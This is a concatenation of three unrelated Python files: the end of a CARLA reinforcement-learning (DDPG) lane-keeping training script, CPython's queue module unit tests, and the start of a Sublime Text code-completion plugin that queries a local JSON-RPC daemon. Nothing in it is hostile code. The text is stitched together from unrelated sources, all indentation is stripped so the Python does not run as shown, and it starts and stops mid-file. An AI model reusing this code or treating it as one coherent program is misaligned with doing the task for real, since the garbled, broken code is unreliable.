obstacle_sensor_config = {'data_type': 'sensor.other.obstacle', 'sensor_tick': 0.02,
'distance': 3, 'attach_to': None}
def gaussian_r(val, mu=30., sigma=10.):
"""calculate the reward of velocity
Args:
vel: velocity, km/h
Return:
a reward
"""
# if vel > 80:
# return 5.
r = math.exp(-((val - mu) ** 2) / (2 * sigma ** 2))
return r
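# Worked numbers for the reward shaping (illustrative only, derived from the formula above):
# with the defaults mu=30., sigma=10., gaussian_r(30.) == 1.0 and gaussian_r(50.) == exp(-2) ~= 0.135.
# For the steer reward used in target_thread (mu=0., sigma=0.05), a steer of 0.0 scores
# 10*1.0 - 5 = +5 while a steer of 0.1 scores 10*exp(-2) - 5 ~= -3.6, so the shaped reward
# lies in roughly (-5, +5] and strongly favours keeping the steering straight.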
def single_execuate(target, args):
threading.Thread(target=target, args=args).start()
def check_whether_respawn_actors(world, vehicles):
"""check whether to respawn the static acotors in a frequency"""
while True:
if carla_actors_static(vehicles, bigger_than=0.75):
respawn_static_actors(world, vehicles)
time.sleep(20)
# def respwan_vehicles_in_traffic_light():
# while True:
# for egopilot in egopilots:
# if egopilot.is_at_traffic_light():
# print('respwan car in traffic light')
# single_execuate(target=respawn_actors, args=(world, [egopilot],))
# time.sleep(0.1)
def target_thread(sess, online_begin_signal):
"""a thread for target nets in DDPG"""
begin = True
exploration_noise = rl_tools.exploration_noise(theta=10., size=1)
avg_r = 0.
episode = 0
prev_contrl = np.zeros(shape=[FLAGS.n_egopilots, 1])
while True:
## get current state
imgs = []
for camera_sensor in cameras:
img = camera_sensor.get()
            img = img[int(FLAGS.img_height*1.8//5):, :, :] ## crop to the ROI
img = cv2.resize(img, dsize=(224, 224))
# cv2.imshow('test', img)
imgs.append(img)
current_img_state = np.array(imgs)
current_img_state = current_img_state*2./255. - 1.
## get current action and control the egopilots
current_action = sess.run(action_online, feed_dict={online_img_state: current_img_state})
## soft
# current_action = 0.5 * current_action + 0.5 * prev_contrl
## control the egopilots ##
for egopilot, c_a in zip(egopilots, current_action):
## add exploration noise
c_a = np.clip(c_a+np.expand_dims(5*exploration_noise.generate(episode//FLAGS.n_egopilots), axis=0), a_min=[-1.], a_max=[1.])[0]
steer = float(c_a[0])
throttle = 0.5
brake = 0.
ego_v = egopilot.get_velocity()
ego_v = math.sqrt(ego_v.x ** 2 + ego_v.y ** 2 + ego_v.z ** 2)
if ego_v > 8. and throttle > 0.5:
throttle = 0.5 ## avoid velocity too big
## apply control
egopilot.apply_control(carla.VehicleControl(throttle=throttle, steer=steer, brake=brake))
prev_contrl = current_action
# cv2.waitKey(300)
        time.sleep(0.5) ## give the applied actions time to take effect before observing the next state
## reward calculation
r_s = np.zeros(shape=(len(egopilots))) ## init is 0 reward
## about the velocity and steer
for i, egopilot in enumerate(egopilots):
v = egopilot.get_velocity()
v = math.sqrt(v.x ** 2 + v.y ** 2 + v.z ** 2)
#
# if v <= 6:
# r_s[i] += v**2/6.
# elif v <= 8:
# r_s[i] += 3 * (8 - v)
# else:
# r_s[i] -= 2 * (v - 8) ** 2
#
# if egopilot.get_control().steer > 0.1 :
# r_s[i] = 0
## make steer small as possible
if v >= 0.1: ##m/s
r_s[i] += (10*(gaussian_r(egopilot.get_control().steer, mu=0., sigma=0.05)) - 5)
else:
r_s[i] = 0.
## about the collision and lane invasion
end = np.zeros(len(egopilots)).astype(np.float32)
i = 0
for egopilot, lane_invasion, obj_collision in zip(egopilots, lane_invasions, obj_collisions):
on_collision = obj_collision.get()
on_invasion = lane_invasion.get()
# if on_collision:
# r_s[i] -= 30
# end[i] = 1.
# episode += 1
# obj_collision.clear()
# single_execuate(target=respawn_actors, args=(world, [egopilot],))
if on_invasion:
episode += 1
r_s[i] -= 30
end[i] = 1.
lane_invasion.clear()
single_execuate(target=respawn_actors, args=(world, [egopilot],))
i += 1
# print('a_r:', r_s)
## get next state
imgs = []
for camera_sensor, egopilot in zip(cameras, egopilots):
img = camera_sensor.get()
            img = img[int(FLAGS.img_height*1.8//5):, :, :] ## crop to the ROI
img = cv2.resize(img, dsize=(224, 224))
imgs.append(img)
next_img_state = np.array(imgs)
next_img_state = next_img_state * 2. / 255. - 1.
## put the memory in pooling
for c_img_state, c_action, n_img_state, c_r, end_f in zip(current_img_state,current_action,
next_img_state, r_s, end):
if c_r > 0:
c = 1
else:
c = 0
memory_pool.put(memory=[c_img_state.astype(np.float32), c_action, n_img_state.astype(np.float32),
c_r, end_f], class_index=c)
if begin and memory_pool.capacity_bigger_than(val=190) and memory_pool.is_balance():
begin = False
online_begin_signal.set()
current_step = sess.run(global_step)
# print(memory_pool.get_propotion())
if FLAGS.log_every_n_steps != None:
            ## calculate the running average reward ##
step = current_step % FLAGS.log_every_n_steps
avg_r = (avg_r * step + np.mean(np.array(r_s))) / (step + 1.)
if step == FLAGS.log_every_n_steps - 1:
logger.info('Step-%s:Reward:%s' % (str(current_step), str(round(avg_r,3))))
def online_thread(sess, online_begin_signal):
"""update the online net thread"""
online_begin_signal.wait()
logger.info('Begin online nets...')
avg_loss = 0.
while True:
#### prepare memory data ####
batch_memorys = memory_pool.get(batch_size=FLAGS.batch_size)
## calculate the norm_rewards and replace raw rewards with them.
# raw_rewards = [m[3] for m in batch_memorys]
# r = rl_tools.normalize_rewards(raw_rewards)
# rl_tools.replace(batch_memorys, r)
current_img_state = []
current_action = []
next_img_state = []
current_reward = []
end_flag = []
for a_memory in batch_memorys:
current_img_state.append(a_memory[0])
current_action.append(a_memory[1])
next_img_state.append(a_memory[2])
current_reward.append(a_memory[3])
end_flag.append(a_memory[4])
current_img_state = np.array(current_img_state)
current_action = np.array(current_action)
next_img_state = np.array(next_img_state)
current_reward = np.array(current_reward)
end_flag = np.array(end_flag)
# print(current_reward[:10])
## update the Online Critic Q(s,a) ##
up, q_l = sess.run([online_critic_update, q_loss], feed_dict={reward: current_reward, whether_end: end_flag, target_img_state: next_img_state,
online_img_state: current_img_state, lr:FLAGS.critic_learning_rate})
## update the Online Actor π(s) ##
sess.run([online_actor_update], feed_dict={online_img_state: current_img_state, lr:FLAGS.actor_learning_rate})
## update steer action ##
# sess.run(online_actor_steer_update, feed_dict={online_action: current_action, online_img_state: current_state, std_steer: std_steer_ops,
# lr:80.*FLAGS.learning_rate})
## soft update the Online nets to Target nets
sess.run([actor_soft_copy_ops, critic_soft_copy_ops])
# logger.info('ones')
current_step = sess.run(global_step)
if FLAGS.log_every_n_steps != None:
            ## calculate the running average loss ##
step = current_step % FLAGS.log_every_n_steps
avg_loss = (avg_loss * step + q_l) / (step + 1.)
if step == FLAGS.log_every_n_steps - 1:
logger.info('Step-%s:Q_loss:%s' % (str(current_step), str(round(avg_loss, 3))))
if FLAGS.f_save_step != None:
if current_step % FLAGS.f_save_step == FLAGS.f_save_step - 1:
print(memory_pool.get_propotion())
## save model ##
logger.info('Saving model...')
model_name = os.path.join(FLAGS.train_dir, 'ddpg_keep_lane')
saver.save(sess, model_name, global_step=current_step)
                logger.info('Save model success...')
if __name__ == '__main__':
########################### TENSORFLOW GRAPH ######################################
    logger.info('Tensorflow graph building...')
## target input ##
target_img_state = tf.placeholder(shape=[None, 224, 224, 3], dtype=tf.float32)
# target_action = tf.placeholder(shape=[None, 1], dtype=tf.float32) ## steer, accel, brake
## online input ##
online_img_state = tf.placeholder(shape=[None, 224, 224, 3], dtype=tf.float32)
# online_action = tf.placeholder(shape=[None, 1], dtype=tf.float32)
## other input ##
reward = tf.placeholder(shape=[None], dtype=tf.float32)
    whether_end = tf.placeholder(shape=[None], dtype=tf.float32) ## 1. if the episode ended, 0. if it continues
lr = tf.placeholder(dtype=tf.float32)
global_step = tf.Variable(0, trainable=False, name='global_step')
gamma = 0.98 ##for gamma discount reward
tau = 1e-3 ##for soft update
## action range config ##
action_range = [[-1.,1.]] ## steer
###############
## target AC ##
###############
target_actor = ddpg.actor()
action_target, target_actor_vars = target_actor.build_graph(img_state=target_img_state, n_action_space=1, is_training=True,
action_range=action_range, var_scope='target_actor')
target_critic = ddpg.critic(max_abs_q_val=40)
q_target, target_critic_vars = target_critic.build_graph(img_state=target_img_state, action=action_target, is_training=True,
var_scope='target_critic')
###############
## online AC ##
###############
online_actor = ddpg.actor()
action_online, online_actor_vars = online_actor.build_graph(img_state=online_img_state, n_action_space=1, is_training=True,
action_range=action_range, var_scope='online_actor')
online_critic = ddpg.critic(max_abs_q_val=40)
q_online, online_critic_vars = online_critic.build_graph(img_state=online_img_state, action=action_online, is_training=True,
var_scope='online_critic')
###################################
### hard copy ops for first init###
###################################
actor_hard_copy_ops = rl_tools.copy_a2b(online_actor_vars, target_actor_vars)
critic_hard_copy_ops = rl_tools.copy_a2b(online_critic_vars, target_critic_vars)
###################
### soft update ###
###################
actor_soft_copy_ops = rl_tools.soft_copy_a2b(online_actor_vars, target_actor_vars)
critic_soft_copy_ops = rl_tools.soft_copy_a2b(online_critic_vars, target_critic_vars)
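    # rl_tools.soft_copy_a2b is defined elsewhere in this project; it is assumed to implement the
    # standard DDPG Polyak update for each variable pair:
    #     target_var <- tau * online_var + (1 - tau) * target_var
    # With tau = 1e-3 (set above) the target nets trail the online nets slowly, which stabilises
    # the bootstrapped Q target used below.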
# #####################################
# ## an ops for online actor update ##
# #####################################
# take_action_ops = online_action.assign(action_online)
###############
## optimizer ##
###############
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
target_actor_bn_ops = []
target_critic_bn_ops = []
online_actor_bn_ops = []
online_critic_bn_ops = []
for update_op in update_ops:
if update_op.name.startswith('target_actor'):
target_actor_bn_ops.append(update_op)
elif update_op.name.startswith('target_critic'):
target_critic_bn_ops.append(update_op)
elif update_op.name.startswith('online_actor'):
online_actor_bn_ops.append(update_op)
elif update_op.name.startswith('online_critic'):
online_critic_bn_ops.append(update_op)
####################################
    ### Online Critic Q(s,a) update ####
####################################
"""
sess.run(online_critic_update, feed_dict={reward:(from memory), whether_end:(from memory), target_state:(next_state),
target_action:(next_action from target_actor(next_state)), online_state:(current_state), online_action:(current_action)})
"""
online_critic_update_ops = target_critic_bn_ops + online_critic_bn_ops
with tf.control_dependencies(online_critic_update_ops):
optimizer_for_online_critic = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-8)
q_loss = tf.reduce_mean(tf.abs(reward + (1.-whether_end)*gamma*q_target - q_online))
q_gradients_vars = optimizer_for_online_critic.compute_gradients(q_loss, var_list=online_critic_vars)
capped_gvs = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in q_gradients_vars] ## clip the gradients
online_critic_update = optimizer_for_online_critic.apply_gradients(capped_gvs)
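        # q_loss above is the absolute TD error against the Bellman target
        #     y = reward + (1 - whether_end) * gamma * Q_target(s', pi_target(s')),
        # i.e. an L1 critic loss rather than the more usual squared error; gradients are clipped
        # to [-5, 5] before being applied.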
#################################
### Online Actor π(s) update ####
#################################
"""
sess.run(online_actor_update, feed_dict={online_action:(current_action), online_state:(current_state)})
"""
online_actor_update_ops = online_critic_bn_ops + online_actor_bn_ops
with tf.control_dependencies(online_actor_update_ops):
optimizer_for_online_actor = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-8)
# q_a_gradients = tf.gradients(q_online, online_action)[0]
# determinstic_policy_gradients_vars = optimizer_for_online_actor.compute_gradients(tf.reduce_mean(-action_online*q_a_gradients), online_actor_vars)
q_val = tf.reduce_mean(-q_online)
determinstic_policy_gradients_vars = optimizer_for_online_actor.compute_gradients(q_val, online_actor_vars)
capped_gvs = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in determinstic_policy_gradients_vars] ## clip the gradients
online_actor_update = optimizer_for_online_actor.apply_gradients(capped_gvs, global_step=global_step)
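        # This is the deterministic policy gradient step: minimising mean(-Q_online(s, pi_online(s)))
        # w.r.t. the actor variables pushes the actor towards actions the critic currently rates
        # highly (equivalent to the commented-out dQ/da * dpi/dtheta form above).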
##########################
### init, saver, ckpt ####
##########################
init = tf.global_variables_initializer()
saver = tf.train.Saver(tf.global_variables(), max_to_keep=5)
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
imitator_ckpt = tf.train.get_checkpoint_state(FLAGS.imitator_checkpoint_dir)
    logger.info('Tensorflow graph build success...')
logger.info('Total trainable parameters:%s' %
str(np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])))
imitator_train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
scope="online_actor.+") ##filter the refine model's vars
imitator_restore_saver = tf.train.Saver(imitator_train_vars)
########################### TENSORFLOW GRAPH ######################################
#### carla world init ####
client = carla.Client('127.0.0.1', 2000)
client.set_timeout(10.0) # seconds
logger.info('Carla connect success...')
logger.info('Carla world initing...')
world = client.get_world()
destroy_all_actors(world)
## spawn vehicles in carla world
spawn_vehicles(world, n_autopilots=0, n_egopilots=FLAGS.n_egopilots)
    time.sleep(2) ## spawning is sometimes unstable right after the request
autopilots = get_all_autopilots(world)
egopilots = get_all_egopilots(world)
cameras = []
lane_invasions = []
obj_collisions = []
# obstacle_aheads = []
logger.info('Adding some sensors to egopilots...')
for egopilot in egopilots:
## attach a camera to egopilot ##
# semantic_camera_config['attach_to'] = egopilot
# semantic_sensor = semantic_camera(world, semantic_camera_config)
# cameras.append(semantic_sensor)
bgr_camera_config['attach_to'] = egopilot
bgr_sensor = bgr_camera(world, bgr_camera_config)
cameras.append(bgr_sensor)
## attach collision sensor to egopilot ##
collision_sensor_config['attach_to'] = egopilot
collision_sensor = collision_query(world, collision_sensor_config)
obj_collisions.append(collision_sensor)
## attach line invasion sensor to egopilot ##
invasion_sensor_config['attach_to'] = egopilot
lane_invasion_sensor = lane_invasion_query(world, invasion_sensor_config)
lane_invasions.append(lane_invasion_sensor)
# ## attach obstacle sensor to egopilot
# obstacle_sensor_config['attach_to'] = egopilot
# obstacle_sensor = obstacle_ahead_query(world, obstacle_sensor_config)
# obstacle_aheads.append(obstacle_sensor)
logger.info('Adding some sensors to egopilots success')
memory_pool = rl_tools.balance_memory_pooling(max_capacity=200, n_class=2)
online_begin_signal = threading.Event()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
if ckpt:
logger.info('loading %s...' % str(ckpt.model_checkpoint_path))
saver.restore(sess, ckpt.model_checkpoint_path)
logger.info('Load checkpoint success...')
else:
sess.run(init)
if imitator_ckpt:
imitator_restore_saver.restore(sess, imitator_ckpt.model_checkpoint_path)
logger.info('load base imitator success...')
sess.run([actor_hard_copy_ops, critic_hard_copy_ops])
logger.info('DDPG all network variables init success...')
check_t = threading.Thread(target=check_whether_respawn_actors, args=(world, autopilots + egopilots,))
target_t = threading.Thread(target=target_thread, args=(sess, online_begin_signal,))
# respwan_v_t = threading.Thread(target=respwan_vehicles_in_traffic_light)
online_t = threading.Thread(target=online_thread, args=(sess, online_begin_signal,))
# target_t.daemon = True
# check_t.daemon = True
# online_t.daemon = True
check_t.start()
# respwan_v_t.start()
target_t.start()
online_t.start()
        while True:
            time.sleep(60)  ## keep the main thread alive; the worker threads do all the work
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import queue
import time
import unittest
from test import support
threading = support.import_module('threading')
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, one of which was rarely seen and went
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTest(unittest.TestCase, BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTest):
type2test = queue.Queue
class LifoQueueTest(BaseQueueTest):
type2test = queue.LifoQueue
class PriorityQueueTest(BaseQueueTest):
type2test = queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return queue.Queue._get(self)
class FailingQueueTest(unittest.TestCase, BlockingTestMixin):
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
|
plugin.py
|
import sys
import re
import time
try:
import completion.jsonrpc as jsonrpc
except:
import jsonrpc
import sublime
import sublime_plugin
import subprocess
import threading
import os
import os.path
import signal
import traceback
def log(a):
settings = sublime.load_settings("completion.sublime-settings")
if settings.get("debug", False):
print(a)
def make_transport():
settings = sublime.load_settings("completion.sublime-settings")
proto = settings.get("proto", "unix")
tp = jsonrpc.TransportUnixSocket
port = settings.get("port", os.path.join(sublime.packages_path(), "User", "completion.rpc"))
if proto == "tcp":
tp = jsonrpc.TransportTcpIp
elif proto == "unix":
if not os.path.exists(port):
start_daemon()
return tp(addr=port, logfunc=log, timeout=2.0)
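# A hypothetical completion.sublime-settings showing the keys this plugin reads
# (values are examples only, not defaults shipped with the plugin):
# {
#     "debug": false,
#     "proto": "unix",                  // or "tcp" to use TransportTcpIp
#     "port": "/path/to/completion.rpc",
#     "launch_daemon": true,
#     "daemon_command": ["/path/to/completion-daemon"]
# }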
def make_proxy():
global proxy
proxy = jsonrpc.ServerProxy(jsonrpc.JsonRpc10(),make_transport())
proxy = None
language_regex = re.compile(r"(?<=source\.)[\w+#]+")
daemon = None
last_launch = None
def pipe_reader(name, pipe, output=False):
global daemon
    while daemon is not None:
try:
line = pipe.readline()
if len(line) == 0:
break
if output:
log("%s: %s" % (name, line))
except:
traceback.print_exc()
break
daemon = None
def start_daemon(daemon_command=None):
global daemon
global last_launch
if daemon_command == None:
settings = sublime.load_settings("completion.sublime-settings")
daemon_command = settings.get("daemon_command")
now = time.time()
output = False
if last_launch != None and (now - last_launch) < 5:
        # The previous launch attempt was less than 5 seconds ago; enable debug
        # output in the pipe-reader threads to show why the daemon keeps exiting.
output = True
last_launch = now
daemon = subprocess.Popen(daemon_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=pipe_reader, args=("stdout", daemon.stdout,output,))
t.start()
t = threading.Thread(target=pipe_reader, args=("stderr", daemon.stderr,output,))
t.start()
def plugin_unloaded():
global daemon
if daemon != None:
daemon.send_signal(signal.SIGINT)
time.sleep(2)
daemon.kill()
daemon = None
def do_query(context, callback, driver, args, launch_daemon, daemon_command, debug=False):
for i in range(2):
        # The loop lets us retry once: start the daemon if it wasn't running (and the user settings allow it), then try again.
s = time.time()
try:
response = driver.CompleteAt(args)
break
except jsonrpc.RPCFault as e:
print(e.error_data)
return
except jsonrpc.RPCTransportError as e2:
if daemon == None and launch_daemon:
start_daemon(daemon_command)
else:
return
e = time.time()
print("Perform: %f ms" % ((e - s) * 1000))
s = time.time()
completions = []
if debug:
print("response:", response)
def relname(dict):
return dict["Relative"] if "Relative" in dict else ""
if "Methods" in response:
for m in response["Methods"]:
n = m["Name"]["Relative"] + "("
ins = n
res = n
if "Parameters" in m:
c = 1
for p in m["Parameters"]:
if c > 1:
ins += ", "
res += ", "
tn = relname(p["Type"]["Name"])
vn = relname(p["Name"])
ins += "${%d:%s %s}" % (c, tn, vn)
res += "%s %s" % (tn, vn)
c += 1
ins += ")"
res += ")"
if "Returns" in m:
# TODO: multiple returns
res += "\t" + relname(m["Returns"][0]["Type"]["Name"])
completions.append((res, ins))
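            # For a hypothetical method "Foo(int a, string b)" returning "bool", the tuple appended
            # above would be ("Foo(int a, string b)\tbool", "Foo(${1:int a}, ${2:string b})"):
            # the first element is what Sublime displays, the second is the snippet inserted.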
if "Fields" in response:
for f in response["Fields"]:
tn = relname(f["Type"]["Name"])
vn = relname(f["Name"])
ins = "%s" % (vn)
res = "%s\t%s" % (vn, tn)
completions.append((res, ins))
if "Types" in response:
# TODO: "Types"
print(response["Types"])
e = time.time()
print("Post processing: %f ms" % ((e - s) * 1000))
if debug:
print(completions)
callback(context, completions)
def get_language(view, caret):
language = language_regex.search(view.scope_name(caret))
if language == None:
return None
return language.group(0)
def prepare_request(view, prefix, locations, settings):
if proxy == None:
make_proxy()
s = time.time()
row, col = view.rowcol(locations[0])
# TODO: detecting which "driver" is to be used should at some point be possible (but not required) to delegate to the server
drivers = {
"c++": "Clang",
"c": "Clang",
"java": "Java",
"cs": "Net"
}
lang = get_language(view, locations[0])
    if lang not in drivers:
return (None, None)
else:
driver = getattr(proxy, drivers[lang])
# TODO: Make the request async
args = {
"Location": {
"File": {
"Name": view.file_name(),
},
"Column": col + 1,
"Line": row + 1
},
"SessionOverrides": {
# TODO: what would be a good way to handle this? Query the "driver" for which options are configurable?
# TODO: Sessions should be used when possible to avoid sending the same configuration all the time.
"compiler_flags": view.settings().get("sublimeclang_options", []),
"net_paths":view.settings().get("net_paths", []),
"net_assemblies":view.settings().get("net_assemblies", []),
}
}
if view.is_dirty():
args["Location"]["File"]["Contents"] = view.substr(sublime.Region(0, view.size()))
e = time.time()
print("Prepare: %f ms" % ((e - s) * 1000))
return (driver, args)
def get_context(view, prefix, locations):
return "%s:%s" % (view.file_name(), locations[0]-len(prefix))
def exec_goto(driver, args):
response = driver.GetDefinition(args)
try:
sublime.active_window().open_file("%s:%d:%d" % (response["File"]["Name"], response["Line"], response["Column"]), sublime.ENCODED_POSITION|sublime.TRANSIENT)
except:
sublime.status_message("definition not found!")
print(response)
class CompletionGotoDefinitionCommand(sublime_plugin.TextCommand):
def __init__(self, view):
self.view = view
def run(self, edit):
settings = sublime.load_settings("completion.sublime-settings")
launch_daemon = settings.get("launch_daemon", False)
daemon_command = settings.get("daemon_command")
debug = settings.get("debug", False)
locations = [a.b for a in self.view.sel()]
prefix = self.view.substr(self.view.word(locations[0]))
driver, args = prepare_request(self.view, prefix, locations, settings)
if driver == None or args == None:
return
args["Identifier"] = prefix
sublime.status_message("looking for definition of %s" % prefix)
t = threading.Thread(target=exec_goto, args=(driver, args))
t.start()
class Ev(sublime_plugin.EventListener):
def __init__(self):
self.request_context = None
self.response_context = None
self.response = None
def got_response(self, context, completions):
if self.request_context != context:
print("Context out of date.. Discarding.")
return
self.response_context = context
self.response = completions
if len(completions) != 0:
sublime.set_timeout(self.hack)
def hack(self):
sublime.active_window().run_command("hide_auto_complete")
def hack2():
sublime.active_window().run_command("auto_complete")
sublime.set_timeout(hack2, 1)
